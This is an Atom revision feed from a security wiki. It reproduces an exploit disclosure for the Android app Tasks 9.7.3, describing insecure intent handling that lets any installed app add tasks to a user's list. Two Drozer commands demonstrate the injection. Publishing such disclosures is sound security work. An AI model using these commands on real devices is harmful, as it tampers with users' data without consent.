<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Tasks_9.7.3_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E</id>
	<title>Tasks 9.7.3 本地權限提升漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Tasks_9.7.3_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Tasks_9.7.3_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T18:50:04Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Tasks_9.7.3_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&amp;diff=1748&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Tasks 9.7.3 - Insecure Permissions # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Tasks_9.7.3_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&amp;diff=1748&amp;oldid=prev"/>
		<updated>2021-04-20T03:11:56Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Tasks 9.7.3 - Insecure Permissions # Exploit Author: Lyhin&amp;#039;s Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Tasks 9.7.3 - Insecure Permissions&lt;br /&gt;
# Exploit Author: Lyhin's Lab&lt;br /&gt;
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/&lt;br /&gt;
# Vendor Homepage: https://tasks.org/&lt;br /&gt;
# Software Link: https://github.com/tasks/tasks&lt;br /&gt;
# Version: 9.7.3&lt;br /&gt;
# Tested on: Android 9&lt;br /&gt;
 &lt;br /&gt;
Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. &lt;br /&gt;
A malicious application has several ways of how to achieve that:&lt;br /&gt;
 &lt;br /&gt;
1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested &amp;quot;task&amp;quot; to the user's task list.&lt;br /&gt;
 &lt;br /&gt;
2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list.&lt;br /&gt;
 &lt;br /&gt;
We used the Drozer application to emulate malicious app activity. Please find the commands below.&lt;br /&gt;
 &lt;br /&gt;
run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT &amp;quot;Kill Mufasa&amp;quot;&lt;br /&gt;
run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT &amp;quot;Visit https://lyhinslab.org&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>